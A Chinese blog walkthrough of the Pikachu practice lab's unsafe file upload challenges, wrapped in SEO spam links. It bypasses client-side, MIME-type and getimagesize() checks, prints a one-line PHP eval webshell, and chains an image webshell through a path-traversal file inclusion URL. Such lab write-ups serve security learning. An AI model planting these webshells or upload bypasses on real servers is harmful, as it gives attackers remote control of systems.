当前位置: 首页 > news >正文

wordpress 隐藏后台常州网络推广seo

wordpress 隐藏后台,常州网络推广seo,外贸网站建设方法,公司企业网站怎么建设pikachu靶场- unsafe upfileupload 概述client checkMIME typegetimagesize() 概述 不安全的文件上传漏洞概述 文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后,后台会对上传的文件进行判断…

pikachu靶场- unsafe upfileupload

  • 概述
  • client check
  • MIME type
  • getimagesize()

概述

不安全的文件上传漏洞概述
文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后,后台会对上传的文件进行判断 比如是否是指定的类型、后缀名、大小等等,然后将其按照设计的格式进行重命名后存储在指定的目录。 如果说后台对上传的文件没有进行任何的安全判断或者判断条件不够严谨,则攻击着可能会上传一些恶意的文件,比如一句话木马,从而导致后台服务器被webshell。

所以,在设计文件上传功能时,一定要对传进来的文件进行严格的安全考虑。比如:

  • 验证文件类型、后缀名、大小;
  • 验证文件的上传方式;
  • 对文件进行一定复杂的重命名;
  • 不要暴露文件上传后的路径;
  • 等等…

client check

上传一句话木马,改为jpg后缀

<?php @eval($_POST['cmd']);?>

在这里插入图片描述
回显了文件保存路径

vul/unsafeupload/uploads/1.jpg

打开路径发现并没有执行php,不符合预期,要想办法上传.php,抓包修改后缀试试,抓包的时候发现前端直接就检测后缀了,那可以先上传jpg在抓包改为php
在这里插入图片描述

在这里插入图片描述
打开页面发现php被执行了,使用蚁剑连接成功

MIME type

在这里插入图片描述

上传php文件抓包修改为image/jpeg类型

在这里插入图片描述
成功上传并被执行了

getimagesize()

在这里插入图片描述
尝试抓包修改后缀名试试
在这里插入图片描述

上传一个图片马,图片马可以上传,但是没有执行,需要有文件包含漏洞
在这里插入图片描述
来到靶场/vul/fileinclude/fi_local.php目录下,拼接图片马返回的url

/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2024/10/24/628730671a0b5396669385741068.jpg&submit=%E6%8F%90%E4%BA%A4

在这里插入图片描述
在这里插入图片描述
成功执行

http://www.hrbkazy.com/news/31061.html

相关文章:

  • 惠州网站建设 英语360优化大师
  • 做网站需要展示工厂么?google下载app
  • 广东建设监理协会网站题库软件测试培训费用大概多少
  • 设计公司网站价格最新百度关键词排名
  • led网站模板百度搜索首页
  • 做销售用什么网站培训心得简短200字
  • 网站分析工具精准营销案例
  • 怎么叫人做网站天津seo诊断技术
  • 能够做冶金工程毕业设计的网站网页制作html代码
  • 自己做网站 最好的软件下载找广告商的平台
  • 建筑英才网招聘信息seo推广技术培训
  • 深圳app制作开发公司排名seo排名需要多少钱
  • WordPress手机导航登陆代码深圳seo推广外包
  • 网站建设需求分析写什么深圳网络推广案例
  • 个人作品集网站模板免费下载收录优美图片官网
  • WordPress站内搜索代码卢松松外链工具
  • 银川网站建设哪家优质沈阳高端关键词优化
  • 市政府网站建设会议新品牌推广方案
  • 欧美做暧网站浏览器如何推广自己网站
  • 惠州制作公司网站今日头条新闻头条
  • b站怎么看视频分区惠州seo关键词
  • 网站seo专员招聘专业软文发稿平台
  • 深圳seo网站网络推广工具和方法
  • vs网站怎么做在线建站模板
  • 如东做网站的公司头条新闻今日头条官方版本
  • 网站建设公司中心seo优化是做什么的
  • 彭水县住房和城乡建设委员会网站百度sem竞价托管
  • 做产品的往这看:国外工业设计网站大全!企业培训考试系统app
  • 温州网站制作案例建设优化网站
  • coremail企业邮箱广州专业seo公司